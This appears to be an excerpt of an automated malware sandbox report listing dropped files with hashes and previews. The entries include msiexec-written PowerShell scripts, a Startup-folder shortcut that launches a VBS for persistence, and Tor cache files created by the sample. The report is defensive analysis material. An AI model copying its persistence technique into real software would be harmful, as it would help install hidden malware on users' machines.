                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: 1
                                                C:\Users\user\AppData\Local\Temp\pssFF45.ps1
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                Category:dropped
                                                Size (bytes):5552
                                                Entropy (8bit):3.485945251159994
                                                Encrypted:false
                                                SSDEEP:96:5wb5jTmmywV2BVrIovmkitxcj6BngOcvjb:5wbdTif/nsyvb
                                                MD5:0C95BC11CFCA37F84A19DE0529377E13
                                                SHA1:41F409DBBAB04EF35C4F6489AF6F85FCEB9C501A
                                                SHA-256:88748AAE11029228D84AEF0855F4BC084DFD70450DB1F7029746D8BC85182F93
                                                SHA-512:8A52F3C40440E3129A367609EE4B6E9E98AA62EDEC48592BE03BAD1AADCD389E2E58E095F4EA3D6F9CB458AA7101FCB5AFDFF66658885BFA0634C74C086DB568
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: ..p.a.r.a.m.(..... . .[.a.l.i.a.s.(.".p.r.o.p.F.i.l.e.".).]. . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.O.u.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".p.r.o.p.S.e.p.".).]. . . . . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.m.s.i.P.r.o.p.K.V.S.e.p.a.r.a.t.o.r..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.F.i.l.e.".).]. . . . .[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. .[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.F.i.l.e.P.a.t.h..... .,.[.a.l.i.a.s.(.".s.c.r.i.p.t.A.r.g.s.F.i.l.e.".).].[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.f.a.l.s.e.).].[.s.t.r.i.n.g.]. .$.u.s.e.r.S.c.r.i.p.t.A.r.g.s.F.i.l.e.P.a.t.h..... .,.[.P.a.r.a.m.e.t.e.r.(.M.a.n.d.a.t.o.r.y.=.$.t.r.u.e.).]. . . . . . . . . . . . . . . . . . . . . . . . . . .[.s.t.r.i.n.g.]. .$.t.e.s.t.P.r.e.f.i.x..... .,.[.s.w.i.t.c.h.]. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                C:\Users\user\AppData\Local\Temp\scrFDAC.ps1
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                Category:dropped
                                                Size (bytes):5314
                                                Entropy (8bit):3.6960003697052586
                                                Encrypted:false
                                                SSDEEP:96:opXTY2ZYIR8QbMjerGuvX9+77vBNCfzD9C0MVgQ0H8W0xI2tHSv/D2:8TY2Zb8Qw0GuV+3vrgagQ+f0xRSXi
                                                MD5:760083834CE1D1B1FFA7D4134702EF37
                                                SHA1:4ACDC74FC95959FCCD939F4B76ED34361B378DAF
                                                SHA-256:82D84ADFABC02FEDB06911B370215B382BB6F21998F65971FFD454B1C9A2BAC9
                                                SHA-512:C6C65AE003984538AC166A91D51EC4871781DD36D84D0D360880950C72504D2A8BFD80A339D1BD898F4BE4BAAC11B3029333195DA8CD6890A087126E1104E9FF
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: ..<.#.......N.O.T.E.S..... . .".p.w.s.h...e.x.e.". .i.s. .r.u.n. .i.f. .r.e.q.u.i.r.e.d. .v.e.r.s.i.o.n. .i.s. .g.r.e.a.t.e.r. .o.r. .e.q.u.a.l. .t.o. .6.,. .o.t.h.e.r.w.i.s.e..... . .".p.o.w.e.r.s.h.e.l.l...e.x.e.". .i.s. .i.n.v.o.k.e.d. .b.y. .d.e.f.a.u.l.t.....#.>.........#.R.e.q.u.i.r.e.s. .-.v.e.r.s.i.o.n. .3.....P.a.r.a.m.(.$.c.u.r.r.e.n.t.P.a.t.h.).........#. .y.o.u.r. .c.o.d.e. .g.o.e.s. .h.e.r.e.........A.d.d.-.T.y.p.e. .-.A.s.s.e.m.b.l.y.N.a.m.e. .S.y.s.t.e.m...W.e.b.........#.........$.t.e.s.t.P.a.t.h. .=. .".$.(.$.e.n.v.:.P.r.o.g.r.a.m.D.a.t.a.).\.7.a.2.6.0.4.2.0.".........i.f. .(.T.e.s.t.-.P.a.t.h. .-.P.a.t.h. .$.t.e.s.t.P.a.t.h.). .{.......b.r.e.a.k.....}.........".". .|. .S.e.t.-.C.o.n.t.e.n.t. .-.P.a.t.h. .$.t.e.s.t.P.a.t.h.........#.........f.u.n.c.t.i.o.n. .r.a.n.d.o.m.S.t.r. .{.......$.c.h.a.r.s. .=. .".A.B.C.D.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U.V.W.X.Y.Z."...T.o.C.h.a.r.A.r.r.a.y.(.).......$.r.e.s.u.l.t. .=. .".".............f.o.r.(.$.i. .=. .0.;.$.i. .-.l.t. .6.;.$.
                                                C:\Users\user\AppData\Local\Temp\scrFDAD.txt
                                                Process:C:\Windows\SysWOW64\msiexec.exe
                                                File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                Category:dropped
                                                Size (bytes):72
                                                Entropy (8bit):3.143682868530171
                                                Encrypted:false
                                                SSDEEP:3:Qx5RvONqMblM6lEjl5KMEXl:Qx5M8MbhEZwMa
                                                MD5:231A4DEF0C4E7AB318D964246B8417B4
                                                SHA1:02E900406D9F913040682F8E83F68B00FC3AAC11
                                                SHA-256:B6C34669E9F67FC15E4EAB22269E76A853E054E9F77AF89F226307924334CB49
                                                SHA-512:0ABE90F4B86A2B746862AA9BED6A3BFD99D028896D69F54CC486EF80AD446202AB60D50B7F2CBFDE59DA040D778FB0C2204A70064BBF0F54697F0DE6A4C91CC8
                                                Malicious:true
                                                Reputation:unknown
                                                Preview: ..-.c.u.r.r.e.n.t.P.a.t.h. .C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.\.L.e.i.t.o.r.
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upspur.lnk
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Nov 24 04:01:27 2021, mtime=Wed Nov 24 04:01:28 2021, atime=Wed Nov 24 04:01:28 2021, length=241, window=hidenormalshowminimized
                                                Category:dropped
                                                Size (bytes):651
                                                Entropy (8bit):4.463336300911097
                                                Encrypted:false
                                                SSDEEP:12:8mB1RAzkkRhQK8THK/3JjAYkL//rV4om:8mBFkbmHKvtAYkLbBm
                                                MD5:D5E66EA9B54ABB2D24052ED7EC975969
                                                SHA1:3C01BF83DC6B5AF0264FE91F240F80B0094BE07B
                                                SHA-256:F7EF586DD9F9CD9CB2414D33A6146A42C9DFE87470281DEBE24C4DE7A509DE60
                                                SHA-512:24653BFE9DCC3DCFD55D21B2AAA0D90C59CD9F4922692DCABC22D59DDA36A461BE6539B3523BD3ECE50A5CFC480B07836336F00A45DE54D072856A69C0677205
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: L..................F.... ....cfV....\.V....\.V.................................P.O. .:i.....+00.../C:\...................T.1.....xS-(..JQHPQS..>......xS'(xS-(..../......................F4.J.Q.H.P.Q.S.....`.2.....xS/( .ECSGNO.vbs..F......xS.(xS/(..............................E.C.S.G.N.O...v.b.s.......C...............-.......B............V.......C:\JQHPQS\ECSGNO.vbs..,.....\.....\.....\.....\.....\.....\.....\.....\.....\.J.Q.H.P.Q.S.\.E.C.S.G.N.O...v.b.s...C.:.\.J.Q.H.P.Q.S.`.......X.......138727...........!a..%.H.VZAj...@ot.+........W...!a..%.H.VZAj...@ot.+........W..E.......9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                C:\Users\user\AppData\Roaming\tor\cached-certs (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):20883
                                                Entropy (8bit):6.052304502917292
                                                Encrypted:false
                                                SSDEEP:384:hd24NVjI1h17bJq2q4OVpd1hG9h4VQV01h2p1ZdMY4mVq1hpG5E10IU4mV91hCRb:b2UWx7NS/9KHLWSHhvA05EC3jneRD4d4
                                                MD5:8AD793E9C375319EA1F7F198D49D5D2F
                                                SHA1:64E2C4AB116B7175A6155263ECABEDB495DE42A8
                                                SHA-256:90521ECFFB9C401F86A05F2CF36705C84750C87F3F9C163942C16348278128EA
                                                SHA-512:B175B71897C83B42973BA7A28730BC841A2BA6E149815E2055FA7CD070E7C8BE8FB7A08BE09D217BF3BA33E8BBEFE83E67A35D9586A0F163844B0F019646E50D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: dir-key-certificate-version 3..fingerprint ED03BB616EB2F60BEC80151114BB25CEF515B226..dir-key-published 2021-03-29 03:27:58..dir-key-expires 2022-03-29 03:27:58..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA1d6uTRiqdMp4BHBYIHKR6NB599Z1Bqw4TbOVkM2N1aSA4V/L/hKI..nl6m/2LL/UAS+E3NCFX0dhw2+D7r7BTJyfGwz0H2MR6Py5/rCMAnPl20wCjXk2qY..ACQa0rJvIqXobwGnDlvxn4ezsj0IEY/FEb61zHnnPHf6d3uyFR1QT06qEOQyYzML..76f/Lud8MUt+8KzsdnadAPL8okNvcS/nqa2bWbbGhC8S8rtDpPg5BhX2ikXa88RM..QdrrackdppB2ttHlq9+iH3c8Wyp7bvdH8uhv410W7RnIE4P+KIxt3L0gqkxCjjyh..mn9ONcdgNOKe31q2cdW5LOPSIK+I5/VTjYjICza7Euyg03drpoBMGLuuJZY6FXEV..auIBncWe+So8FMxqU/fwo5xm6x085U1MwXUmi4XDYpr/kau6ytPnzzw9J++4W9iC..em5Jp0vaxrDnPdphqT0FWsBAwsZFL7nZRnmUlTgGsXUa0oSM9/MErDwzELh/NwG4..DNyyzRG8iP61AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAsw2ZJlGsmfDmDwoKbzjOno759Xwqn6JX+tFasI8eRjOFnOyjYzd1..XjG6Gj2hVpF/ze2NiTuUyRu3Ybp8G9/gs8VGPljxSHkEugGjQdYFoST02ma0vUHA..8YqpBYOiLvsXnqfEkl3Yj6HVxmVJ
                                                C:\Users\user\AppData\Roaming\tor\cached-certs.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):20883
                                                Entropy (8bit):6.052304502917292
                                                Encrypted:false
                                                SSDEEP:384:hd24NVjI1h17bJq2q4OVpd1hG9h4VQV01h2p1ZdMY4mVq1hpG5E10IU4mV91hCRb:b2UWx7NS/9KHLWSHhvA05EC3jneRD4d4
                                                MD5:8AD793E9C375319EA1F7F198D49D5D2F
                                                SHA1:64E2C4AB116B7175A6155263ECABEDB495DE42A8
                                                SHA-256:90521ECFFB9C401F86A05F2CF36705C84750C87F3F9C163942C16348278128EA
                                                SHA-512:B175B71897C83B42973BA7A28730BC841A2BA6E149815E2055FA7CD070E7C8BE8FB7A08BE09D217BF3BA33E8BBEFE83E67A35D9586A0F163844B0F019646E50D
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: dir-key-certificate-version 3..fingerprint ED03BB616EB2F60BEC80151114BB25CEF515B226..dir-key-published 2021-03-29 03:27:58..dir-key-expires 2022-03-29 03:27:58..dir-identity-key..-----BEGIN RSA PUBLIC KEY-----..MIIBigKCAYEA1d6uTRiqdMp4BHBYIHKR6NB599Z1Bqw4TbOVkM2N1aSA4V/L/hKI..nl6m/2LL/UAS+E3NCFX0dhw2+D7r7BTJyfGwz0H2MR6Py5/rCMAnPl20wCjXk2qY..ACQa0rJvIqXobwGnDlvxn4ezsj0IEY/FEb61zHnnPHf6d3uyFR1QT06qEOQyYzML..76f/Lud8MUt+8KzsdnadAPL8okNvcS/nqa2bWbbGhC8S8rtDpPg5BhX2ikXa88RM..QdrrackdppB2ttHlq9+iH3c8Wyp7bvdH8uhv410W7RnIE4P+KIxt3L0gqkxCjjyh..mn9ONcdgNOKe31q2cdW5LOPSIK+I5/VTjYjICza7Euyg03drpoBMGLuuJZY6FXEV..auIBncWe+So8FMxqU/fwo5xm6x085U1MwXUmi4XDYpr/kau6ytPnzzw9J++4W9iC..em5Jp0vaxrDnPdphqT0FWsBAwsZFL7nZRnmUlTgGsXUa0oSM9/MErDwzELh/NwG4..DNyyzRG8iP61AgMBAAE=..-----END RSA PUBLIC KEY-----..dir-signing-key..-----BEGIN RSA PUBLIC KEY-----..MIIBCgKCAQEAsw2ZJlGsmfDmDwoKbzjOno759Xwqn6JX+tFasI8eRjOFnOyjYzd1..XjG6Gj2hVpF/ze2NiTuUyRu3Ybp8G9/gs8VGPljxSHkEugGjQdYFoST02ma0vUHA..8YqpBYOiLvsXnqfEkl3Yj6HVxmVJ
                                                C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2175813
                                                Entropy (8bit):5.623200040786907
                                                Encrypted:false
                                                SSDEEP:12288:8QKoJWc9DfsFwnNfBWMjxiZEluWY7KG+kR+LcJ+AfXiIgU+0:8QKoJWADKQNfLoZ0e7v0cUC+0
                                                MD5:FB3D3CAADE1A3BAAAFB0FB3F07BE0A4D
                                                SHA1:CDE7AFAB2C9F9732C60329858885CB9F62C6B8AC
                                                SHA-256:2B9AC369D38326F1D603D6C37D0E6DAE9EDA69B7C13553142D9F15616E249937
                                                SHA-512:2E0328859E081D0CB6AB2E07E064E42C203AD9C7DD712268C3415C159DB0E9F9DE31C2F38F72E553ED15EA5E175D0F657A7CF3A3E9830D5DC1EBF2DABAFB7E07
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: network-status-version 3 microdesc.vote-status consensus.consensus-method 31.valid-after 2021-11-23 19:00:00.fresh-until 2021-11-23 20:00:00.valid-until 2021-11-23 22:00:00.voting-delay 300 300.client-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.server-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.known-flags Authority BadExit Exit Fast Guard HSDir NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=
                                                C:\Users\user\AppData\Roaming\tor\cached-microdesc-consensus.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2175813
                                                Entropy (8bit):5.623200040786907
                                                Encrypted:false
                                                SSDEEP:12288:8QKoJWc9DfsFwnNfBWMjxiZEluWY7KG+kR+LcJ+AfXiIgU+0:8QKoJWADKQNfLoZ0e7v0cUC+0
                                                MD5:FB3D3CAADE1A3BAAAFB0FB3F07BE0A4D
                                                SHA1:CDE7AFAB2C9F9732C60329858885CB9F62C6B8AC
                                                SHA-256:2B9AC369D38326F1D603D6C37D0E6DAE9EDA69B7C13553142D9F15616E249937
                                                SHA-512:2E0328859E081D0CB6AB2E07E064E42C203AD9C7DD712268C3415C159DB0E9F9DE31C2F38F72E553ED15EA5E175D0F657A7CF3A3E9830D5DC1EBF2DABAFB7E07
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: network-status-version 3 microdesc.vote-status consensus.consensus-method 31.valid-after 2021-11-23 19:00:00.fresh-until 2021-11-23 20:00:00.valid-until 2021-11-23 22:00:00.voting-delay 300 300.client-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.server-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.known-flags Authority BadExit Exit Fast Guard HSDir NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=
                                                C:\Users\user\AppData\Roaming\tor\cached-microdescs.new
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2139555
                                                Entropy (8bit):5.343596712207728
                                                Encrypted:false
                                                SSDEEP:24576:j8j/CAwCUzKKoyTkkkguxFaeVSoQa26HQHBSztL6fDkQ3RKkxLtGI9/r2vBdutfW:V1k6gCkx
                                                MD5:40B913D150ED2FF16F55281CBA83FB55
                                                SHA1:6899B0C5AFE273645833F0BF2C50F37A7BB12A55
                                                SHA-256:6AD935A2C560B7A6D180E5F472816AD2AD356FA181F22D80B7FEC099899F1087
                                                SHA-512:2A31FDEA74862662F40B655252E3842A47E75145B60663B4761EC1635BDD603518F69143E68787E983D79483315302B7891ABCBF663C7271DF667984B6DD5D75
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: @last-listed 2021-11-24 05:01:51.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAMdK9lZVTj7yv5dV93c4PonzfaBUJS/AQGMSKV4OOySYJg4Z2iPHHmNV.d/SUzN3YXwCUoTIRgixkeLaNhvCK2X/xg5UrHj5c6g17a2zfJMUpVS6GCZURfSz5.iy9zwbXtGg4GyzXEK+/yOeBJ8HDl8+YysgYeeXnjHfcAKwthwjvrAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key O35RR0hicRxVApXFfWlVHPFDGUOv15h0vtCAS5pn4lo.id ed25519 4q6QRQC1qXpO5v03gUH8fs1RerUAf/z9xZEG215OS4w.@last-listed 2021-11-24 05:01:51.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBALX4CGzbUClhjGBIfRSx7FZlEbp5c/LwFUUgV11Zgt+C+3wE1mIb7MN1.zI3P5gnMGZfOI/sj0vygov1ujR1FWPutEzo4O3QfZtlCQYXSTk+y2zQmKexD1odd.Ed9DE3rB9YVsiRRDcUHlYkky5HfU0LR40Jam+xXeVB/Dh9/9A4uZAgMBAAE=.-----END RSA PUBLIC KEY-----.ntor-onion-key v6ZlZfiJOFFTx5gnDxW60KuZUJLLeVWSxVRK7ZRSMyk.id ed25519 ZdxS4rxGp+0OTox+3d9ksh9/S+n+WmFM2iVueomfzDI.@last-listed 2021-11-24 05:01:51.onion-key.-----BEGIN RSA PUBLIC KEY-----.MIGJAoGBAJ3oCqNP0u5F9p2aQW3bSwKZfHxIOpG4mlTCMvo0Vuq0W9XSokW6P++9.3djW8GFzt345iKiGNAQU7hNfXucnIrI8Z4LHtXlAzvm9x
                                                C:\Users\user\AppData\Roaming\tor\state (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):3454
                                                Entropy (8bit):5.296213116970063
                                                Encrypted:false
                                                SSDEEP:48:c4CFUNGIg7ZH8hz+bkLpXkAMs/Cr8z3nkWeTqvlcEtyIugIdOWXu:3+UAlR8hzrLNkALS8zXWTGchIupdOqu
                                                MD5:F55CDB55BE895D0DD3A235F0C02615E4
                                                SHA1:A5109324F9EC9903062EEC66EDB24CADBDBF9A7E
                                                SHA-256:A01C29D77F6A367A2CC223D8E7872C1C17EA23F637AE70ACA8C805789C295BB3
                                                SHA-512:FDDA1E19B9D8729F3503536DFAB2A1E2F3FE2EA8270E835407253C3E9143637516E5D5E696EE339C2B42B09F30F99467718436297CE0F2C7CB08EC0F03B59789
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: # Tor state file last generated on 2021-11-23 21:02:19 local time..# Other times below are in UTC..# You *do not* need to edit this file.....Dormant 0..Guard in=default rsa_id=F1E87923D9A29DE6C42B60441EBD17F8DE1D4AF4 nickname=NiceGuy sampled_on=2021-11-16T13:23:24 sampled_idx=0 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=CC2179A97D4EC55BFA56B27F2300C53162CEBB6E nickname=Assange019de sampled_on=2021-11-23T07:14:58 sampled_idx=1 sampled_by=0.4.5.9 listed=1 confirmed_on=2021-11-16T10:03:13 confirmed_idx=0..Guard in=default rsa_id=7778BBD947C2A5543120891C78F9E4EAE2D2B908 nickname=UnredactedTelecomix sampled_on=2021-11-17T06:19:30 sampled_idx=2 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=8927AD37F39D10C3F4CFDD5213606E4881CCF6B0 nickname=tirz sampled_on=2021-11-18T09:27:26 sampled_idx=3 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=4E052ABD8C5D4219C4519540DC0C91B21AFB8FC5 nickname=bouncer4u sampled_on=2021-11-15T21:14:41 sampled_idx=4 sampled_by=0.4.5.9 listed=1..Gua
                                                C:\Users\user\AppData\Roaming\tor\state.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):3454
                                                Entropy (8bit):5.296213116970063
                                                Encrypted:false
                                                SSDEEP:48:c4CFUNGIg7ZH8hz+bkLpXkAMs/Cr8z3nkWeTqvlcEtyIugIdOWXu:3+UAlR8hzrLNkALS8zXWTGchIupdOqu
                                                MD5:F55CDB55BE895D0DD3A235F0C02615E4
                                                SHA1:A5109324F9EC9903062EEC66EDB24CADBDBF9A7E
                                                SHA-256:A01C29D77F6A367A2CC223D8E7872C1C17EA23F637AE70ACA8C805789C295BB3
                                                SHA-512:FDDA1E19B9D8729F3503536DFAB2A1E2F3FE2EA8270E835407253C3E9143637516E5D5E696EE339C2B42B09F30F99467718436297CE0F2C7CB08EC0F03B59789
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: # Tor state file last generated on 2021-11-23 21:02:19 local time..# Other times below are in UTC..# You *do not* need to edit this file.....Dormant 0..Guard in=default rsa_id=F1E87923D9A29DE6C42B60441EBD17F8DE1D4AF4 nickname=NiceGuy sampled_on=2021-11-16T13:23:24 sampled_idx=0 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=CC2179A97D4EC55BFA56B27F2300C53162CEBB6E nickname=Assange019de sampled_on=2021-11-23T07:14:58 sampled_idx=1 sampled_by=0.4.5.9 listed=1 confirmed_on=2021-11-16T10:03:13 confirmed_idx=0..Guard in=default rsa_id=7778BBD947C2A5543120891C78F9E4EAE2D2B908 nickname=UnredactedTelecomix sampled_on=2021-11-17T06:19:30 sampled_idx=2 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=8927AD37F39D10C3F4CFDD5213606E4881CCF6B0 nickname=tirz sampled_on=2021-11-18T09:27:26 sampled_idx=3 sampled_by=0.4.5.9 listed=1..Guard in=default rsa_id=4E052ABD8C5D4219C4519540DC0C91B21AFB8FC5 nickname=bouncer4u sampled_on=2021-11-15T21:14:41 sampled_idx=4 sampled_by=0.4.5.9 listed=1..Gua
                                                C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus (copy)
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2175813
                                                Entropy (8bit):5.623200040786907
                                                Encrypted:false
                                                SSDEEP:12288:8QKoJWc9DfsFwnNfBWMjxiZEluWY7KG+kR+LcJ+AfXiIgU+0:8QKoJWADKQNfLoZ0e7v0cUC+0
                                                MD5:FB3D3CAADE1A3BAAAFB0FB3F07BE0A4D
                                                SHA1:CDE7AFAB2C9F9732C60329858885CB9F62C6B8AC
                                                SHA-256:2B9AC369D38326F1D603D6C37D0E6DAE9EDA69B7C13553142D9F15616E249937
                                                SHA-512:2E0328859E081D0CB6AB2E07E064E42C203AD9C7DD712268C3415C159DB0E9F9DE31C2F38F72E553ED15EA5E175D0F657A7CF3A3E9830D5DC1EBF2DABAFB7E07
                                                Malicious:false
                                                Reputation:unknown
                                                Preview: network-status-version 3 microdesc.vote-status consensus.consensus-method 31.valid-after 2021-11-23 19:00:00.fresh-until 2021-11-23 20:00:00.valid-until 2021-11-23 22:00:00.voting-delay 300 300.client-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.server-versions 0.3.5.10,0.3.5.11,0.3.5.12,0.3.5.13,0.3.5.14,0.3.5.15,0.3.5.16,0.3.5.17,0.4.5.1-alpha,0.4.5.2-alpha,0.4.5.3-rc,0.4.5.4-rc,0.4.5.5-rc,0.4.5.6,0.4.5.7,0.4.5.8,0.4.5.9,0.4.5.10,0.4.5.11,0.4.6.1-alpha,0.4.6.2-alpha,0.4.6.3-rc,0.4.6.4-rc,0.4.6.5,0.4.6.6,0.4.6.7,0.4.6.8,0.4.7.1-alpha,0.4.7.2-alpha.known-flags Authority BadExit Exit Fast Guard HSDir NoEdConsensus Running Stable StaleDesc Sybil V2Dir Valid.recommended-client-protocols Cons=2 Desc=2 DirCache=2 HSDir=2 HSIntro=4 HSRend=
                                                C:\Users\user\AppData\Roaming\tor\unverified-microdesc-consensus.tmp
                                                Process:C:\JQHPQS\MRZANK.exe
                                                File Type:ASCII text, with very long lines
                                                Category:dropped
                                                Size (bytes):2175813
                                                Entropy (8bit):5.623200040786907
                                                Encrypted:false
                                                SSDEEP:12288:8QKoJWc9DfsFwnNfBWMjxiZEluWY7KG+kR+LcJ+AfXiIgU+0:8QKoJWADKQNfLoZ0e7v0cUC+0
                                                MD5:FB3D3CAADE1A3BAAAFB0FB3F07BE0A4D
                                                SHA1:CDE7AFAB2C9F9732C60329858885CB9F62C6B8AC
                                                SHA-256:2B9AC369D38326F1D603D6C37D0E6DAE9EDA69B7C13553142D9F15616E249937
                                                SHA-512:2E0328859E081D0CB6AB2E07E064E42C203AD9C7DD712268C3415C159DB0E9F9DE31C2F38F72E553ED15EA5E175D0F657A7CF3A3E9830D5DC1EBF2DABAFB7E07
                                                Malicious:false
                                                Reputation:unknown
